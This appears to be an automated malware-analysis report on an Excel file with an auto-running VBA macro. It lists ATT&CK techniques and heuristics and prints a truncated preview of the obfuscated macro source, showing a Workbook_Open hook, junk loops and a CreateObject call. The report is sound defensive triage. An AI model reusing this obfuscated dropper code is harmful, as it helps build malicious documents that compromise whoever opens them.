MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file is an Excel document containing VBA macros, specifically a Workbook_Open event handler. Heuristics indicate the use of Shell() and CreateObject(), common for executing arbitrary code. The VBA code is heavily obfuscated and truncated, preventing a full analysis of its actions, but the presence of these functions strongly suggests it attempts to download and execute a second-stage payload. The primary attack vector is likely Spearphishing Attachment.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14882 bytes |
SHA-256: 0fe7ff886c37c601655573ee257a0e3302cccf4b9055d381f9305d305eac80a2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
FkV81Ol.hJ6HIsprBW3HOovWzHEY
While 26 = 5057
Dim F1A_rD6E7ixRi_Q_oWl2DDIzirmBfWf As Object
Wend
Dim IJUtpH6Z_wjtb As String
While 3 = 2406
Dim iiiIVqqafLUCpJY9Z3hiBmGMTk5s7g_bSq As Object
Wend
Dim P9Hboyo_m79 As String
While 1 = 3441
Dim q_8eZm3AJY5aTxuu8c8G3r93Zy7Ms37_IMmk7Me3JZHPUgwm4Cqj As Object
Wend
Dim nyE8_D_kpo As String
While 3 = 3853
Dim QPb5PFJIxt7_7airg2ARSoJVTTFnj2G4 As Object
Wend
Dim KeG1wYOpbtN6lh1 As String
While 15 = 2498
Dim nXQfKiVUl_Ei6_eh5kC2aRq4FlTziYNsvbaNRU6TyIeuqzS As Object
Wend
Dim p7JRTioYTq As String
While 24 = 6748
Dim WXiNeuLzUwbgOOioqCPw5KPRn3WE3IEBEg47V As Object
Wend
Dim ERWR4UBzGp4so1 As String
While 3 = 8083
Dim lGguJFPilWE7KpYZrTlRks3dAzNaeLbVMQb4hvsy_ep_L7HTYq8 As Object
Wend
Dim iFVN3NCtT1xCY4r As String
While 18 = 2648
Dim s3Me25kvLEB3QCp3AxM3NzCindBW8OaP_cMOF4yB7TIHzTupm8wN As Object
Wend
Dim J_c2zmzV3Lx6muw As String
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "FkV81Ol"
Dim OH4n6t6NoRZFAEDas68VMGgKnntWfHkfK37WIvwBWTL4acrxvd1jUL2Gjq9Q_greq45GHpQ6G5834mtJ55kAQ_I9_y As String
Function xyYvF9K54p3rSsTs9bL__9UYbCaGtfLe_f(mDE1UDihcCLeddt_h_R_EhFjWPqdT6r4zQ98y_kgv9OIRaQuH5s8dW9_7dbDV_LgTQoKduNccuMER6P595TYKsXaR3ASkfJpuryAu_OWoOcsH2v_MgDatwTj2M2ks517jgTiF)
While 27 = 4566
Dim GbLYxdvDwjYUtwP_ekfcMKVCWfz3UlXf8NRiZ787 As Object
Wend
Dim jkRaG82AFIGrp As String
While 7 = 2494
Dim op6EHBPm2qJJ3Wecqnhli2l344YnyvKcpzRgV As Object
Wend
Dim bP4pRq3FPNiV As String
While 8 = 5082
Dim fXehEEvDCKNllxEeqdBD8FMVn5PIrulnyQ As Object
Wend
Dim RVo4isfbSPBPD As String
Dim nE6KgiTbwsxxTIXDQxuau9qNIqajq_vYkFsUEV_5c_EiaHJWnTacDcsoWqAyGtur6XLMZB84sz7t2FwAfC5VmRTFVD7XUNwsMWlB577lUgsMf8vO4_RDxW
While 22 = 5808
Dim dkWYvLeWYJH4IykUPhiwTesyv4Qgdv7SV1uhSUzaS32Ke_Y44FCqbc As Object
Wend
Dim r91hm2473lLygQ As String
While 2 = 6329
Dim CBA5rFcalfRvcWlVsNz2Hvpur7gU9N8paGz1EG9T_PUSN1W As Object
Wend
Dim eTf388oHPUNLtiF As String
While 19 = 531
Dim aVhlSUftOjNe12YUfzhAAbT9qu9iez5Mt2x9ukfB9iORrbwPz9rUJhE9Ai4 As Object
Wend
Dim hV7MXo_t8CZ As String
Dim wva1DZ63wo5vWRkyyYymTHUkbSD9RRverhNDoc_TeZkt1TFRZJzasGhnYyXsV6id3XDyDgHUSdG4fjtGLtgFaSvi9jmy_U7hzF1aPPN3AdGN_nFy_PflXaBildyc4SO7fhCXsRz5d
While 5 = 8413
Dim j4SfAZKBON7rsfGhCKvy7Jq8oATzlrryLXWwAnfov8RnjnMpOE7hKMc As Object
Wend
Dim XLUz__UYgfGd As String
While 3 = 1204
Dim SHTgWnEB82BVAwnietHl959inxfiZhuGaH4g4hi3_JefJ As Object
Wend
Dim yLZu4wVeeX As String
While 14 = 4529
Dim Hu3iGfkXE3513En7IOfwYaWo8SHon8t6mdWHn_uhiEYPC7STE6lF8q As Object
Wend
Dim qWLjwW5tGH9MW As String
While 26 = 4061
Dim qeQIc8LRAElA_wiqUm75epuaX7JnTQGCs5minal9cnoPj As Object
Wend
Dim iwiUCvdAQ1_ As String
While 22 = 4028
Dim tytewh8s8hPDI9C3_7Z1_c1yIjQQelBZDlyxpEK5p6QAQsYU_2dCz_9O8 As Object
Wend
Dim UKPoLUfy9g As String
While 21 = 427
Dim IML4teIDKyfYJ5QmG8jDlhzus_m_r6da As Object
Wend
Dim s1KuojQSy5DGW6 As String
Set wva1DZ63wo5vWRkyyYymTHUkbSD9RRverhNDoc_TeZkt1TFRZJzasGhnYyXsV6id3XDyDgHUSdG4fjtGLtgFaSvi9jmy_U7hzF1aPPN3AdGN_nFy_PflXaBildyc4SO7fhCXsRz5d = CreateObject(OH4n6t6NoRZFAEDas68VMGgKnntWfHkfK37WIvwBWTL4acrxvd1jUL2Gjq9Q_greq45GHpQ6G5834mtJ55kAQ_I9_y)
While 15 = 1939
Dim TWiMgN54jWaIt2HUOS_oRse7goOMqdqVw9RlGr7Kx7jWMYgao As Object
Wend
Dim hxxROpk1lp28p As String
While 10 = 2483
Dim LEpDUthfLgV2zUGGsFFwhGp3DfRpteADLG As Object
Wend
Dim tcqHCw2HTPZYXTb As String
While 14 = 1856
Dim r2htIGDYw9xa2vqeQnrkmZiCS5YvXanG7MAlbSC_oD3HM As Object
Wend
Dim T_UmuGtpsxQQ As String
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.